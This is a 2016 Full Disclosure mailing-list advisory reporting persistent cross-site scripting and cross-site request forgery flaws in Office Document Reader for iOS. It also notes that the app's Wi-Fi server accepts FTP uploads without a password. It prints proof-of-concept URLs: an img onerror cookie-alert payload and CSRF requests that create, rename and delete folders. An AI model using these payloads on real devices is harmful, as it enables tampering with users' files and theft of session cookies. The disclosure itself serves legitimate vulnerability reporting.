Date: Sun, 3 Jan 2016 01:44:39 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
	<fulldisclosure@...lists.org>
Subject: [FD] Vulnerabilities in Office Document Reader for iOS

Hello list!

Happy New Year!

There are multiple vulnerabilities in Office Document Reader for iOS. There
are Cross-Site Scripting and Cross-Site Request Forgery vulnerabilities.
Earlier I've informed developer of Office Document Reader about this and
other his software.

-------------------------
Affected products:
-------------------------

Vulnerable are Office Document Reader 5.1.13 for iOS and previous versions.
Vulnerable as paid, as free version (at the beginning the paid function
works of access via Wi-Fi, which turns on http and ftp server).

-------------------------
Affected vendor:
-------------------------

LTD DevelSoftware.

----------
Details:
----------

Cross-Site Scripting (WASC-08) (Persistent XSS):

http://192.168.0.28/createdir?path=%3Cimg%20src=%271%27%20onerror=%27alert(document.cookie)%27%3E

http://192.168.0.28/rename?path=%2FFolder&newpath=%271%27%20onerror=%27alert(document.cookie)%27%3E

Cross-Site Scripting (WASC-08) (Persistent XSS):

Through FTP it's possible to set name of folder or file with XSS code. The
access to http and ftp servers via local networks is not limited (without
password). Therefore via uploading it's possible in particular to conduct
XSS attack.

Cross-Site Request Forgery (WASC-09):

The whole functionality is vulnerable to CSRF attacks: creation, renaming
and deleting of a folder.

http://192.168.0.28/createdir?path=%2FFolder

http://192.168.0.28/rename?path=%2FFolder&newpath=%2FFolder2

http://192.168.0.28/delete?path=%2FFolder

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/8092/).

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site